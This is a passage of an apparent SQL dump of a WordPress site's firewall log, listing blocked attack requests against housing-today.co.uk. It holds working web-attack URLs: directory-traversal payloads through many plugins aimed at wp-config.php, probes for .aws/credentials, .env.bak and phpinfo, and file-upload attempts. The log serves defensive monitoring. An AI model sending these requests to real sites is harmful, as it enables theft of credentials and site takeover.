Upload','{\"learningMode\":0,\"failedRules\":\"89\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9UZXZvbHV0aW9uL3RtcGxjb25uZWN0b3IvbW9uZXRpemUvdGVtcGxhdGljLWN1c3RvbV9maWVsZHMvc2luZ2xlLXVwbG9hZC5waHA=\",\"category\":\"file_upload\",\"ssl\":1}'),(2339,1629939078.249231,1629939078.124400,'\0\0\0\0\0\0\0\0\0\0����ǎ',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'python-requests/2.26.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(2340,1630203171.858797,1630203171.766600,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://housing-today.co.uk/.env.bak',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnYuYmFr\",\"category\":\"brute-force\",\"ssl\":1}'),(2341,1630203162.546630,1630203162.452000,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://housing-today.co.uk/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2F3cy55bWw=\",\"category\":\"brute-force\",\"ssl\":1}'),(2342,1630203152.714369,1630203152.619600,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://housing-today.co.uk/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8=\",\"category\":\"brute-force\",\"ssl\":1}'),(2343,1630203141.926193,1630203141.806300,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://housing-today.co.uk/phpinfo.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(2344,1630203133.335568,1630203133.237300,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://housing-today.co.uk/_profiler/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L19wcm9maWxlci9waHBpbmZv\",\"category\":\"brute-force\",\"ssl\":1}'),(2345,1630203226.874231,1630203226.777900,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://housing-today.co.uk/config.js',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy5qcw==\",\"category\":\"brute-force\",\"ssl\":1}'),(2346,1630203217.852700,1630203217.166500,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://housing-today.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(2347,1630203210.238051,1630203210.144000,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://housing-today.co.uk/config/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbmZpZy9hd3MueW1s\",\"category\":\"brute-force\",\"ssl\":1}'),(2348,1630203203.442029,1630203203.334100,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://housing-today.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(2349,1630203197.824502,1630203197.730000,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://housing-today.co.uk/.aws/credentials',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5hd3MvY3JlZGVudGlhbHM=\",\"category\":\"brute-force\",\"ssl\":1}'),(2350,1630203183.817242,1630203183.715800,'\0\0\0\0\0\0\0\0\0\0���Z�s',0,403,0,0,0,'https://housing-today.co.uk/info.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(2351,1630230544.175196,1630230544.055700,'\0\0\0\0\0\0\0\0\0\0��)%�',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2352,1630230543.682646,1630230542.807800,'\0\0\0\0\0\0\0\0\0\0��)%�',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2353,1630495500.166231,1630495499.963900,'\0\0\0\0\0\0\0\0\0\0��_��',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2354,1630495517.071990,1630495516.981900,'\0\0\0\0\0\0\0\0\0\0��_��',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2355,1630495542.105773,1630495542.011700,'\0\0\0\0\0\0\0\0\0\0��_��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxldXJsXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1taW5pYXVkaW9wbGF5ZXIvbWFwX2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2356,1630495533.856184,1630495533.764400,'\0\0\0\0\0\0\0\0\0\0��_��',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1ttbGFfZG93bmxvYWRfZmlsZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZWRpYS1saWJyYXJ5LWFzc2lzdGFudC9pbmNsdWRlcy9tbGEtZmlsZS1kb3dubG9hZGVyLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2357,1630545713.343374,1630545713.265000,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/advanced-custom-fields/core/actions/export.php?acf_abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thY2ZfYWJzcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hZHZhbmNlZC1jdXN0b20tZmllbGRzL2NvcmUvYWN0aW9ucy9leHBvcnQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2358,1630545713.102296,1630545713.019600,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?alg_wc_pif_download_file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thbGdfd2NfcGlmX2Rvd25sb2FkX2ZpbGVd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2359,1630545712.856423,1630545712.773900,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-post.php?alg_wc_pif_download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thbGdfd2NfcGlmX2Rvd25sb2FkX2ZpbGVd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2360,1630545712.611493,1630545712.530700,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2361,1630545712.367469,1630545712.284200,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/worprees-plugin-bug-dar/ultimate-member/includes/admin/core/class-admin-upgrade.php?pack=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYWNrXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b3JwcmVlcy1wbHVnaW4tYnVnLWRhci91bHRpbWF0ZS1tZW1iZXIvaW5jbHVkZXMvYWRtaW4vY29yZS9jbGFzcy1hZG1pbi11cGdyYWRlLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2362,1630545712.121246,1630545712.015100,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tkb3dubG9hZF0=\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2363,1630545711.851870,1630545711.770300,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1ttbGFfZG93bmxvYWRfZmlsZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZWRpYS1saWJyYXJ5LWFzc2lzdGFudC9pbmNsdWRlcy9tbGEtZmlsZS1kb3dubG9hZGVyLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2364,1630545711.607330,1630545711.525000,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2365,1630545711.305290,1630545711.211100,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2366,1630545717.801176,1630545717.719300,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cmxd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC13aXRoLXNwcml0ei93cC5zcHJpdHouY29udGVudC5maWx0ZXIucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2367,1630545717.556255,1630545717.463100,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxldXJsXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1taW5pYXVkaW9wbGF5ZXIvbWFwX2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2368,1630545717.300371,1630545717.216600,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/wp-filemanager/incl/libfile.php?path=..%2F..%2F..%2F..%2Fwp-config.php&filename=wp-config.php&action=download',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlbWFuYWdlci9pbmNsL2xpYmZpbGUucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2369,1630545716.830534,1630545716.751500,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zM2J1YmJsZS1hbWF6b24tczMtaHRtbC01LXZpZGVvLXdpdGgtYWR2ZXJ0cy9hc3NldHMvcGx1Z2lucy91bHRpbWF0ZS9jb250ZW50L2Rvd25sb2FkZXIucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(2370,1630545716.006868,1630545715.925300,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtl&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1ttbGFfZG93bmxvYWRfZmlsZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZWRpYS1saWJyYXJ5LWFzc2lzdGFudC9pbmNsdWRlcy9tbGEtZmlsZS1kb3dubG9hZGVyLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(2371,1630545715.762847,1630545715.667600,'\0\0\0\0\0\0\0\0\0\0��-�$',0,403,0,0,0,'https://housing-today.co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - 